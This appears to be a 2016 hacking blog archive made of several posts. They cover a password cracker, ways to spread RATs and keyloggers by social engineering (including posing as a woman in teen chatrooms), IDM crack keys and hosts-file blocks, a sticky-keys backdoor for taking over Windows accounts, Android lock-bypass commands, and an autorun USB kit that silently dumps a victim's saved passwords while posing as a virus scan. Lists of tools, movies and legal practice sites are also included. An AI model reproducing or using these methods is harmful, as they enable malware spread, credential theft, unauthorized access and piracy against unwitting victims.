Tuesday, March 15, 2016

Brutus Password Cracker

Hi Friends,
Brutus is one of the fastest, most flexible remote password crackers you can get your hands on – it’s also free. It is available for Windows 9x, NT and 2000, there is no UN*X version available although it is a possibility at some point in the future. Brutus was first made publicly available in October 1998 and since that time there have been at least 370,000 downloads. Development continues so new releases will be available in the near future.
Brutus version AET2 is the current release and includes the following authentication types :
  • HTTP (Basic Authentication)
  • HTTP (HTML Form/CGI)
  • POP3
  • FTP
  • SMB
  • Telnet
Other types such as IMAP, NNTP, NetBus etc are freely downloadable from this site and simply imported into your copy of Brutus. You can create your own types or use other peoples.

The current release includes the following functionality :
  • Multi-stage authentication engine
  • 60 simultaneous target connections
  • No username, single username and multiple username modes
  • Password list, combo (user/password) list and configurable brute force modes
  • Highly customisable authentication sequences
  • Load and resume position
  • Import and Export custom authentication types as BAD files seamlessly
  • SOCKS proxy support for all authentication types
  • User and password list generation and manipulation functionality
  • HTML Form interpretation for HTML Form/CGI authentication types
  • Error handling and recovery capability inc. resume after crash/failure.
You can download it here:


Brutus AET2

How To Succedfully Spread Your RAT/Botnet/Keylogger!!

Method 1...
MySpace

  • Sign up at Myspace.com
  • Make a sexy name.. like Christina Johnsson..
  • And When you are done.. Change the profile picture to some sexy bimbo chick.
  • As Profile Info.. Write that you are single and that you are modelling.. etc. etc. and soon enough people will add you. (Hopefully Guys :P ).
  • Tell them that you have made a portfolio and you want them to try it out. Send your RAT/Bot/Keylogger server to them... Make sure they runs it.. and there you go, A slave... now do this to many peoples and you will get many victims =) 
Method 2...

Chatrooms

  • Google This: "Teen Chatroom"... Or anything Similiar.
  • Name your name to some sexy chick name.
  • Enter A Chatroom And Tell Them You Want To Show Some Webcam.
  • Tell them your E-Mail Adress.. Add Them.
  • Now, Tell them that they have to Run your Webcam Patch... Wich ofcourse is fake .. (Your Server.. Hopefully Crypted with an Webcam Icon).. They'll be like.. Sure.. now.. You got them on your Botnet list/ RAT.. whatever :D!..

Method 3...

Youtube

  • Sign Up Here.
  • After That, Make a video.. With an fake program. You can easily steal one from someone else by writing OK infront of youtube. Example: http://www.OKyoutube.com/Watch-291209dsa.  
  • Get comments from friends saying that it works.. etc. etc.
  • And After A While You Will Get Views And Downloads =)!

Method 4...

Java Applet.. (Quick Explained...)

  • Download Java Files Here. LINK UPDATED! NOW WORKS!
  • Extract it to desktop.
  • Sign Up To: Fileave.com And Log In.
  • Upload Your RAT/Keylogger/Bot .. Whatever! and copy the link..
  • Right Click The Index2 in Java Folder. Now Edit it with -> Notepad <-.. edit thoose parts that are squared. (credits to Krypyro for the image) and replace the text Insert Link here with your copyed link. on both places. Spoiler (Click to View)(Had to spoiler it because it is way to big ;P )
  • Sign Up To And Login At: Atspace.com
  • Now Go to Subdomain Manager.. make a new domain named to whatever you want.
  • Now go to file manager. Upload everything in the java folder to the domain.
  • Now try your Java Page. By Going to your page.. Example.atspace.com and try it out! =)
  • Go to this page: Dot.tk and rename your Atspace page to something good.. like Cybersmexhackers.tk or something like that xD.. (Has to end with .TK)

Crack Internet Download Manager (idm) manually any versio

Hi Friends,
I have a trick to crack Internet download manager(IDM), it`s not any joke and not fake it`s really work........ in every system!!!!!!!
Everyone know Internet Download Manager is the best download manager & by using Internet Download Manager we can download youtube videos and many other web videos easily, fastly and the best thing about the Internet Download Manager is you can resume the pushed download link many time. But Internet Download Manager is premium software means its not free you can use it for a 30 days trial version and you have to buy the license. But I am using it without buying the license and if you want to use freely premium So follow the simple steps to crack your Internet Download Manager manually.

Follow these steps to crack Internet Download Manager

1. Install Internet Download Manager.
    If you don`t have IDM setup Download from here.
2. After installing IDM, Download the hosts file from here.

3. And Go to  C:\Windows\System32\drivers\etc folder and replace that old hosts file with new one.

4. Now open IDM and go to registration > registration.

 Now enter First name,Last name, email and add this key  HUDWE-UO689-6D27B-YM28M  and press ok!!!!!!

   hurryyyyy!!!!! And you have done, after this your IDM will never ask for the serial key, your IDM convert in fu

Crack IDM Manually (Specially For Windows 7 Users)

Hi Friends,

Mostly time after updating your IDM, it shows error "you have registered IDM using fake serial key". In my old post, I posted to download IDM without any keygen, but it shows error while installing it in Windows 7 something like "Windows cannot find 'crys18.exe' make sure that u typed the name correctly". Later I search on net how to crack IDM, then finally I found a solution. If you are windows 7 users, then this post is for you, because for XP/Vista users , users can easily access full version IDM by downloading it from here without any keygen & error, follow these steps:
  • Download the IDM, then click on Registration.
  • A dialog box will appear asking for Name, Last Name, Email Address and Serial Key.
  • Now Enter you name, last name, email address and in field of Serial Key enter any of the following Keys:
                        RLDGN-OV9WU-5W589-6VZH1
                        HUDWE-UO689-6D27B-YM28M
                        UK3DV-E0MNW-MLQYX-GENA1
                       398ND-QNAGY-CMMZU-ZPI39
                       GZLJY-X50S3-0S20D-NFRF9
                       W3J5U-8U66N-D0B9M-54SLM
                       EC0Q6-QN7UH-5S3JB-YZMEK
                       UVQW0-X54FE-QW35Q-SNZF5
                       FJJTJ-J0FLF-QCVBK-A287M
  • After clicking, it will show error message that you have registered IDM using fake serial key and IDM will exit.
  • Now Go to the path C:\WINDOWS\system32\drivers\etc\hosts
  • Open hosts file with notepad.
  • Now copy the below lines of code and paste it to below 127.0.0.1 localhost
                                    127.0.0.1 tonec.com
                                    127.0.0.1 www.tonec.com
                                    127.0.0.1 registeridm.com
                                    127.0.0.1 www.registeridm.com
                                    127.0.0.1 secure.registeridm.com
                                    127.0.0.1 internetdownloadmanager.com
                                    127.0.0.1 www.internetdownloadmanager.com
                                    127.0.0.1 secure.internetdownloadmanager.com
                                    127.0.0.1 mirror.internetdownloadmanager.com
                                    127.0.0.1 mirror2.internetdownloadmanager.com
  • Save it.
  • Now check IDM, it should be converted to full version.
Note: In Windows 7 sometimes it denied access to write anything on hosts file, so first you must be logged in as Administrator and then change the file permissions of hosts file.

Enjoy it............

Sunday, March 13, 2016

Hack Windows 10 Login Password In 2 Minutes [Works For All Windows Versions

Forgot Windows Administrator Password? The first thing a normal user tries to do is take the PC to service center and do a  fresh re-installation of windows. In that case one may lose all the data,not to mention the service charges.  In another scenario,suppose if you want to hack into someone's PC there are a few methods to follow,like using Hiren CD,Trinity Rescue Kit,OphCrack etc. It takes considerable amount of time and computer skills and also these methods are not always successful. In such cases the below given method comes in handy.

Reset Windows 10 [Including Windows 8.1,8,7,Vista and XP] Password Without Knowing The Current Password. 


This is an old method,and it is based on a windows feature [Sticky Keys] found in all versions from the Old Windows XP to the latest Windows 10. Well it is a bit surprising to know that this classic windows backdoor works even in the latest Windows 10 !

Okey,So follow the below steps to Hack Windows 10.

Things you need-


1) Any Linux live CD(like Ubundu CD)/USB. If you don't have one download any Linux distribution ISO file and Make a bootable CD/USB. For simplicity sake I suggest Puppy Linux (lightest Linux distro,less than 200mb).

2)Basic knowledge in dealing with cmd,boot menu etc.

So let's get started.


1)Insert the live CD/Usb and boot from it. [You may need to Turn off Secure Boot feature for UEFI BIOS]

2)Locate the drive where Windows is installed.(C drive) Goto Windows/system32 folder.

3)Find out a file named 'cmd.exe' and rename it to 'cmd0.exe'

4)Next find another file by the name 'sethc.exe' [It is the program for windows sticky keys] Rename sethc.exe to cmd.exe.

5)Finally rename cmd0.exe to sethc.exe. [Swapping the sticky keys program with Command Promt (cmd). So whenever Sticky Keys program is called it runs cmd and vice versa. ]

5)Great! Now Shutdown and boot into Windows.

6)Press shift key five or six times at the login screen.

7)Now the command prompt will open up. Type this without quotes and hit enter.
"net user"

8) Now you can see the list of active accounts [User Names] in the PC. Make a note of the Account Name you need to hack.

9) type the following command and hit enter.

"net user <space><Account Name><space> *"


Note  <space>: leave space

          <Account Name> Replace it with the account you need to hack. In this example 'Mathews'

8)It will display 'enter new password'. Enter any new password and confirm. To remove password leave it blank.

 Done! You can login with the new password now.

[Tutorial] Hacking/Bypassing Android Password/Pattern/Face/PIN

Android is one of the most popular SmartPhone Operating System. As of Now there are over a billion android users. Every android user must be familiar with Pattern/PIN lock/Face Recognition,a security feature which ensures authorized access to their devices.  But sometimes the users forget the pattern or they try the wrong pattern more than the permitted number of tries allowed,getting locked out. In this guide I have collected almost all possible methods to break/bypass a pattern/PIN/Face protected android device.

Disclaimer; Do at your risk. I am not responsible for any damages caused and hacking someone's phone is a crime.

Method 1 ( Only If Custom Recovery like Cwm, Twrp, Xrec,Etc... is Installed:)

. Download this zip Pattern Password Disable on to your sdcard (using your PC, as you cant get into your phone)
2. Insert the sdcard into your phone
3. Reboot into recovery mode
4. Flash the zip
5. Reboot
6. Done!

Method 2 (For All Devices With Custom Recovery Installed )

(Using Aroma File Manager)

1.Download and Copy Aroma File manager.zip to your memory card.

2. Open your recovery (press volume Down + Power button or it can be different according to the phones. Generally the phones who have press able button on the middle they have to press all three buttons. Google for you pattern)

3. There will be an option in recovery called “mount”. Go in that option and then mount all the cache and everything what is there.

4. Then select “update” and select “apply update from SD/external” and select aroma file manger.zip file that you downloaded.

5. After Flashing or updating, the aroma file manger will open. Use volume keys for up/down and power button 2 select like you use to get into recovery.

6. In aroma File manager , Go to menu , which is located in bottom strip and then select Settings.

7. Go to bottom n select “mount all partition in startup ” then exit from aroma file manger.

8. Now after exit , re-update that aroma file again and it will open again.

9. Go to data >> and then System.

Then find ‘gesture.key’ (for pattern lock) and ’password.key’ (for password lock) then long touch on gesture.key or password.key and sum option will be prompted , choose delete and delete that file and restart.

Method 3 (No Custom Recoveries Installed)

Requirements.PC(Linux or Windows+Cygwin Installed)

  • PC(Linux or Windows+Cygwin Installed)
  • USB Cable and
  • adb(Android Debug Bridge) installed.
  • How to install adb(Linux)

    Open Terminal Type the below command and hit enter.

    sudo apt-get install android-tools-adb

    Follow the instructions until everything is installed.

    How to install adb(Windows)


    Download the .exe and run it. For download & Instrutions refer the guide here

     

    Procedure


  • Connect the phone to the computer via USB(phone should be turned on).
  • Open a terminal window(Linux) or cmd(windows).
  • Type the below commands one by one,pressing enter.
adb devices
adb shell
cd data/system
su
rm *.key
  • That's all. Reboot the device. 
  • Method 4 (All Devices Via Adb - SQL Command)

    • Open terminal(Linux)/cmd(Windows) and type the following commands,each at a time,followed by enter. 
    adb shell
    cd /data/data/com.android.providers.settings/databases
    sqlite3 settings.db
    update system set value=0 where name='lock_pattern_autolock';
    update system set value=0 where name='lockscreen.lockedoutpermanently';
    .quit
  • Done. Reboot the device.

Note : After Restarting if it still asks any pattern/PIN,just try some random pattern/PIN

Method 5 (All Devices Via Adb - File Removal )


Procedure:


  • Open terminal(Linux)/cmd(Windows) and type the following command.
adb shell rm /data/system/gesture.key
That's it. You should be able to use the device without password/Pattern lock now. If it asks for password?pattern at startup just give any random pattern/PIN

Method 6 (All Devices With USB Debugging Enabled )

Procedure: (Primary Steps)

  • Download & Extract Bypass Security Hack program. 
  • Open SQLite Database Browser 2.0.exe in SQLite Database Browser.
  • Navigate to By-pass security Hacks folder and open Terminal/Cmd there. 
  • Run the file pull settings.db.cmd this will pull out the setting file out of your phone.
  • Drag settings.db and drop to SQLite Database Browser 2.0.exe program.
  • Navigate to Browse data tab, At table there, click to list down the selection & delete secure

Instruction To Remove Pattern Lock:


  • Continuing the above procedures,find the record named lock_pattern_autolock, and delete it.
  • Close & save database
  • Run push settings.db.cmd and reboot your phone

Instruction To Remove PIN Lock:


  • From the list, find lockscreen.password_type, double-click it & change it's value to 65536, and apply changes. (Note: If that file is not there create it)
  • Next find lock_pattern_autolock, and delete record, If doesn't exist, Ignore
  • Close & save database
  • Run push settings.db.cmd and reboot your phone

Instruction To Remove Password Lock:

  • Find lockscreen.password_salt, Delete Record
  • Next find lockscreen.password_type, Delete Record
  • Close & save database
  • Run push settings.db.cmd and reboot your phone

As always give any random password/PIN/Pattern if it asks in the first boot.

Method 7 (Taking Precaution Before Lock Accident) :

As the title says,this method will act as a precaution, before you get locked up,while you still have access to the device.

  • SMS Bypass [Root Required]- Download  & Install It On Your Device. 
  • This App Allows You To Remotely Bypass Your Phone's Screen Lock By Sending A SMS.
  • It Removes Your Gesture Pattern Or Password After Receiving A Preset Keyword Along With A Secret Code Via SMS.
  • SMS Bypass App Requires Root.

Procedure:


1.First, make sure you give permanent root access to the app.
2.Change the secret code to your preferred choice. The default password is : 1234
3.To reset your screen lock, send the following message from another phone:secret_code reset
Example:

1234 reset

Note 1 : There is a space between your secret code and reset. Also the secret code is case sensitive.
Note 2 : There is an option available to change the preset keyword. Default is : reset - Your phone will restart and your lock screen will be reset.

If None Of The Above Methods Work,Do Facry Reset/Full Wipe The Device

 

Thursday, March 10, 2016

The Top 10 Best Hacker Movies

As of late, Hollywood has taken a sparkle to programmers, with programmers showing up in verging on each heist or puzzle motion picture now. This can be both great and terrible for our calling. As we probably am aware, whichever way Hollywood chooses to portray our calling is the manner by which a great many people will see it.The good news is that not all of Hollywood’s depictions of hackers are negative, despite the overwhelming perception by the masses that our profession is a malicious one.

In trying to determine the ten best hacker movies, I tried to only use those films where people are actually entering into other peoples’ or organizations’ computers for good or ill. Very often, reviewers of this genre include any movie with computer “stuff” as a “hacker movie.” In my definition of a hacker movie, someone must be using advanced skills to access someone else’s computer, without their consent or knowledge, for good or ill.

Takedown


Takedown (also known as Trackdown) is a B-grade movie—a fictionalized and sensationalized account of the tracking and capture of probably the most infamous U.S. hacker, Kevin Mitnick. Based upon the book and written by his nemesis, Tsutomu Shimomura, the story tends to glorify Shimomura. Mitnick operated in the 1980s and ’90s and eventually went to prison for a couple of years. Now, he is a highly paid IT security consultant, speaker, and writer.
This movie has low production values, despite having some relatively well-known actors (Skeet Ulrich, Tom Berenger, and Amanda Peet, among others). Don’t expect to learn much hacking from this movie, though, as nearly the entire 1 hour and 36 minutes is a story about tracking down Kevin Mitnick as the FBI and Shimomura searches for him across the states.

Swordfish

In Swordfish, Hugh Jackman plays a retired, elite hacker who has been released from a long prison term and is now working in the oil fields and living in a trailer. He is approached by an organized crime figure played by John Travolta, and is forced to do one last hacking job against his will.
Unfortunately, the hacking is forgettable and far from reality. Jackman’s character is seen breaking into highly secure systems within seconds, while gyrating geometric objects appear on his screen. Very little depiction of the actual hard work that goes into hacking is seen, and they make it look like a computer game.
The most memorable part of this movie is Halle Berry’s topless scene. Although it has nothing to do with hacking, it does make this movie memorable.

The Italian Job

Although the MINI Coopers are really the stars of The Italian Job (a remake of the 1969 film of the same name), Seth Green plays Lyle, a hacker among a group of elite thieves, who is able to manipulate traffic signals, among other devices, that make this grand theft possible. Could this hacker have been using Shodan to identify and assist in hacking these devices?

Wednesday, March 9, 2016

How To Become A Pro Hacker: 5 Hacking Skills You Must Require

Every person who is attached to the technology and technical websites are aware with the term Hacker. The term applied to the person who uses his computer and laptop to access the unauthorized data. Learn about hacking and trying it is not a crime unless you are doing it in order to get unauthorized access to any data. You can use it for your security as well so that others can’t hack you. If you think hackers only hacks into networks and steal data, then you are wrong in that part. The main motive behind providing hacking courses and its learning to the people, who are interested to become hackers and are ready to tackle with other hackers who are not using their skills nicely. So today I will tell you about 5 hacking skills which will show you how to become hacker. Because if you want to become a pro hacker you need to beat one. So check out these skills below
5 Skills Required To Become A Pro Hacker
1. Basic Computer and Networking Skills
  

Basic knowledge is the base of any knowledge. If you know about the basic functions of your computer and if you can easily register and set your own networking parameters on your windows, it will definitely help you while you are learning hacking. Every person who wishes to become a hacker will have to understand these networking skills:
IPv4, IPv6, DHCP, NAT, Subnetting, DNS, Routers and switches, VLANs, OSI model, Public v Private IP, MAC addressing, ARP.
These skills will definitely help them to grow their hacking capability.
2. Linux Skill and Wireshark


Hackers love Linux OS. We can say that Linux is the favorite operating system of hackers. The hacking tools we used on the Linux are specially made and developed for hackers. Linux provides an open source platform and free operating systems for hackers which windows doesn’t provide. That’s why hackers use Linux. To know more about Linux, Click on the link below.
On the other hand, Wireshark is free software used for educational purpose, network troubleshooting, software and communications protocol development as well as for the analysis. It is actually an open source packet analyzer.
3. Virtualization And Security Concepts
The meaning of virtualization is that you need to make a virtual version to test your hacking skills before go live. You can do this by making a virtual version of the operating system, storage device and server or network resources. If you want to become a pro hacker you have to learn these security concept skills like Secure Sockets Layer (SSL), Public Key Infrastructure (PKI), Intrusion Detection System (IDS), Firewalls and so many more. Your strong hold on security will let you control barriers set by security Admin.
4. Wireless Technologies and Scripting
The most popular thing on the hacking is how to hack a wifi. People who wish to hack a wireless network or devices must have to understand all of their functions. For that they need to learn professional encryption algorithm like WPA, WEP, WPA2, WPS and the 4 way handshake. On the other hand Scripting is the most important skill if you need to become a pro hacker. Sometimes hackers use other hackers’ tools to hack something. By doing that, they got dis- rated for using those tools. So you need to make a new tool which you can use to cope with hackers. Security Admin does that when any hacking attempt happens on their server.
Database and Web Applications


With the help of big DBMS like Oracle and My SQL. You will able to access or hack databases on the other computers. The Database is the collection of data present on the computer and can accessible with so many ways. Whereas Web Applications is the software which you can use on the internet with your web browser. You will be able to do anything if you will find out the functioning of all the web applications and the database backing them.










 


 
 

Monday, March 7, 2016

Hack Password Using Pen Drive.

Today I will show you how to retrieve/hack passwords using USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and a USB Pendrive you can create your own rootkit to retrieve/hack passwords from your friend's/college Computer.

You will need the following tools to create your rootkit.
Click on their name to download them.

  1. MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger,Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
  2. Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
  3. IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0, v6.0
  4.  Protected Storage Pass View: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
  5. PasswordFox: Password Fox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field,Password Field, and the Signons filename.
Note:All the software with which you are going to make rootkit might not work on few computer due to uncompatibality with micro-processor or may generate false alet like viruses.These softwares are 100% virus free but when they try to recover password,antivirus restrict this process for security measures resulting in to false alert.

Here is a step by step procedure to create the password retrieving/hacking pendrive toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.


1. Download all the 5 tools.To download,click on the name of software.
Extract them and copy only the executables (.exe files) into your USB Pendrive .i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Pendrive.

2. Open Notepad  and copy the following text into it.
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from
"New Text Document.txt" to autorun.inf
Now copy the autorun.inf  file onto your USB Pendrive.

Open cmd,navigate to your pendrive,to navigate in your pendrive type "d:" and hit enter,where "d" is drive name.Then type this commands "attrib -s -h *.* /s  /d".This will hide all the data in your pendrive.

3. Again open Notepad file and copy the following text onto it.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Save the Notepad and rename it from
"New Text Document.txt" to "launch.bat".
Copy the "launch.bat"  file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the
passwords. You can use this pendrive on any computer to sniff
the stored passwords.

Just follow these steps to retrieve/hack password.

Step 1:-  Insert the pendrive and the autorun window will pop -up(This is because, we have created an autorun pendrive).
Step 2:- In the pop-up window, select the first option (Perform a
Virus Scan).
Step 3:- Now all the password recovery tools will silently get executed in the background (This process takes hardly a fewseconds).The passwords get stored in the .TXT files.
Step 4:- Remove the pendrive and you'll see the stored passwordsin the .TXT files.

This hack works on Windows 2000, XP,till now i have not tested it on windows 7,so try it if you can and then give us feedback.

Warning: This procedure will only recover the stored passwords (if any) on the Computer.

NOTE:These software are used to recover passwords from windows,its the redesigning and creativity that we made it into a auto-executable program to recover password silently without anyone knowledge.



NOTE:TRY THIS AT YOUR OWN RISK.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.THE ABOVE INFORMATION IS FOR EDUCATION AND RESEARCH PURPOSE ONLY.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE TRICK.

Vulnerable Web Application Lists For Learning Pentest

Here's a list of Vulnerable Web Application sites for learning Penetration Testing,  you can legally scan / "attack" to exploit. They are mostly hosted by security companies as "target practice".


No. Vulnerable Application Platform
1 SPI Dynamics (live) ASP
2 Cenzic (live) PHP
3 Watchfire (live) ASPX
4 Acunetix 1 (live) PHP
5 Acunetix 2 (live) ASP
6 Acunetix 3 (live) ASP.Net
7 PCTechtips Challenge (live)
8 Damn Vulnerable Web Application PHP/MySQL
9 Mutillidae PHP
10 The Butterfly Security Project PHP
11 Hacme Casino Ruby on Rails
12 Hacme Bank 2.0 ASP.NET (2.0)
13 Updated HackmeBank ASP.NET (2.0)
14 Hacme Books J2EE
15 Hacme Travel C++ (application client-server)
16 Hacme Shipping ColdFusion MX 7, MySQL
17 OWASP WebGoat JAVA
18 OWASP Vicnum PHP, Perl
19 OWASP InsecureWebApp JAVA
20 OWASP SiteGenerator ASP.NET
21 Moth
22 Stanford SecuriBench JAVA
23 SecuriBench Micro JAVA
24 BadStore Perl(CGI)
25 WebMaven/Buggy Bank
26 EnigmaGroup
27 XSS Encoding Skills
28 Google – Gruyere
29 Exploit- DB Multi-platform
30 The Bodgeit Store JSP
31 LampSecurity PHP
32 hackxor Perl(CGI)
33 OWASP – Hackademic PHP
34 Exploit.co.il-WA PHP
35 crackme.cenzic.com PHP
36 hackthissite.org

If you know other legally web applications for learning, please mention bellow. We will update it. And let us know if there are any links are dead.

100 best hacking tools

as you all know about hackers,but let us clear here first that using hacking tools doesn’t make you a hacker.you will be called noob in the hackers world.always remember hackers doesn’t  use hacking tools but they build hacking tools.
so we are brought 100 hacking tools that can help you in hacking.PORT SCANNERS
1. Nmap 2. Superscan3. Angry IP Scanner
 PASSWORD CRACKERS
4. Ophcrack

5. Medusa

6. RainbowCrack

7. Wfuzz

8. Brutus

9. L0phtCrack

10. fgdump

11. THC Hydra

12. John The Ripper
13. Aircrack
 PACKET SNIFFERS
14. Wireshark

15. Tcpdump

16. Ettercap

17. dsniff

18. EtherApe 


VULNERABLITY SCANNERS



19. Nessus

20. OpenVAS

21. Nipper

22. Secunia PSI

23. Retina

24. QualysGuard

25. Nexpose


WIRELESS HACKING
26. Aircrack-ng

27. Kismet

28. inSSIDer

29. KisMAC 
HACKING OPERATING SYSTEMS
30. Kali Linux
31. SELinux
32. Knoppix

33. BackBox Linux

34. Pentoo

35. Matriux Krypton

36. NodeZero 
37. Blackbuntu

38. Samurai Web Testing Framework 
39. WEAKERTH4N

40. CAINE (Computer Aided Investigative Environment)

41. Bugtraq

42. DEFT

43. Helix
ENCRYPTION TOOLS
44. TrueCrypt

45. OpenSSH

46. Putty

47. OpenSSL

48. Tor

49. OpenVPN

50. Stunnel 
51. KeePass
PACKET CRAFTING
60. Hping

61. Scapy

62. Netcat

63. Yersinia

64. Nemesis
65. Socat

VULNERABLITY EXPLOITATION

   
66. Metasploit

67. sqlmap

68. sqlninja

69. Social Engineer Toolkit

70. NetSparker

71. BeEF

72. Dradis
INTRUSION DETECTION SYSTEMS
73. Snort

74. NetCop
TRAFFIC MONITORING
75. Splunk

76. Nagios

77. P0f

78. Ngrep
WEB VULNERABLILTY SCANNER
79.Burp Suite

80. WebScarab

81. Websecurify

82. Nikto

83. w3af
ROOKIT DECTECTORS




84. AIDE (Advanced Intrusion Detection Environment)
WEB PROXIES
85. Paros

86. Fiddler

87. Ratproxy

88. sslstrip

FIREWALLS
89. Netfilter

90. PF: OpenBSD Packet Filter 
FUZZERS
91.skipfish
92. Wfuzz
93. Wapiti
94. W3af
OTHER HACKING TOOLS
95. Netcat

96. Traceroute

97. Ping.eu

98. Dig

99. cURL

100. Sleuth Kit

many people install backtrack or kali linux in their systems and using tools they got access and call themselves a hacker,as we have talk with most famous hackers of the world like mauritania attacker ,syrian electronic amry,anonghosts,and other anonymous hackers.
using kali linux doesn’t make you a hacker.as per the famous and professional hackers some of them haven’t using kali linux yet,they are using other operating systems.
meet hackers

Vulnerable Web Application Lists For Learning Pentest

Here's a list of Vulnerable Web Application sites for learning Penetration Testing,  you can legally scan / "attack" to exploit. They are mostly hosted by security companies as "target practice".


No. Vulnerable Application Platform
1 SPI Dynamics (live) ASP
2 Cenzic (live) PHP
3 Watchfire (live) ASPX
4 Acunetix 1 (live) PHP
5 Acunetix 2 (live) ASP
6 Acunetix 3 (live) ASP.Net
7 PCTechtips Challenge (live)
8 Damn Vulnerable Web Application PHP/MySQL
9 Mutillidae PHP
10 The Butterfly Security Project PHP
11 Hacme Casino Ruby on Rails
12 Hacme Bank 2.0 ASP.NET (2.0)
13 Updated HackmeBank ASP.NET (2.0)
14 Hacme Books J2EE
15 Hacme Travel C++ (application client-server)
16 Hacme Shipping ColdFusion MX 7, MySQL
17 OWASP WebGoat JAVA
18 OWASP Vicnum PHP, Perl
19 OWASP InsecureWebApp JAVA
20 OWASP SiteGenerator ASP.NET
21 Moth
22 Stanford SecuriBench JAVA
23 SecuriBench Micro JAVA
24 BadStore Perl(CGI)
25 WebMaven/Buggy Bank
26 EnigmaGroup
27 XSS Encoding Skills
28 Google – Gruyere
29 Exploit- DB Multi-platform
30 The Bodgeit Store JSP
31 LampSecurity PHP
32 hackxor Perl(CGI)
33 OWASP – Hackademic PHP
34 Exploit.co.il-WA PHP
35 crackme.cenzic.com PHP
36 hackthissite.org

If you know other legally web applications for learning, please mention bellow. We will update it. And let us know if there are any links are dead.

Complete Resources About Exploitation Development for Ethical Hackers

Assembly Language:


C/C++:


Python:

Python has a wonderful official documentation, apart from that you can use the following books/courses:


BOOKS



TUTORIALS

Corelan.be

Opensecuritytraining.info

Securitytube.net


Massimiliano Tomassoli’s blog

Samsclass.info


Securitysift.com

Justbeck.com

0xdabbad00.com

fuzzysecurity.com

sploitfun.wordpress.com

sneakerhax.com

community.rapid7.com

resources.infosecinstitute.com

rafayhackingarticles.net

Stack Based Overflow Articles

Heap Based Overflow Articles

Kernel Based Exploit Development Articles

Windows memory protections Introduction Articles.

Windows memory protections Bypass Methods Articles.

Windows Exploits


TRAININGS

Opensecuritytraining.info


Module 12 of Advanced penetration testing cource on Cybrary.it

Securitytube.net

infiniteskills.com



COURSES

Corelan


Offensive Security


SANS

Ptrace Security

Udemy


VIDEOS




TOOLS

  • IDA Pro – Windows disassembler and debugger, with a free evaluation version.
  • OllyDbg – An assembly-level debugger for Windows executables.
  • WinDbg
  • Mona.py
  • angr – Platform-agnostic binary analysis framework developed at UCSB’s Seclab.
  • BARF – Multiplatform, open source Binary Analysis and Reverse engineering Framework.
  • binnavi – Binary analysis IDE for reverse engineering based on graph visualization.
  • Bokken – GUI for Pyew and Radare.
  • Capstone – Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages.
  • codebro – Web based code browser using clang to provide basic code analysis.
  • dnSpy – .NET assembly editor, decompiler and debugger.
  • Evan’s Debugger (EDB) – A modular debugger with a Qt GUI.
  • GDB – The GNU debugger.
  • GEF – GDB Enhanced Features, for exploiters and reverse engineers.
  • hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols.
  • Immunity Debugger – Debugger for malware analysis and more, with a Python API.
  • ltrace – Dynamic analysis for Linux executables.
  • objdump – Part of GNU binutils, for static analysis of Linux binaries.
  • PANDA – Platform for Architecture-Neutral Dynamic Analysis
  • PEDA – Python Exploit Development Assistance for GDB, an enhanced display with added commands.
  • pestudio – Perform static analysis of Windows executables.
  • Process Monitor – Advanced monitoring tool for Windows programs.
  • Pyew – Python tool for malware analysis.
  • Radare2 – Reverse engineering framework, with debugger support.
  • SMRT – Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis.
  • strace – Dynamic analysis for Linux executables.
  • Udis86 – Disassembler library and tool for x86 and x86_64.
  • Vivisect – Python tool for malware analysis.
  • X64dbg – An open-source x64/x32 debugger for windows.
  • SploitKit – a suite of cli tools to automate the tedious parts of exploit development
  • ShellSploit framework
  • ROP Injector

HEAP EXPLOITATION TECHNIQUES



VULNERABLE APPLICATIONS

Exploit-exercises.com



EXPLOITS DATABASE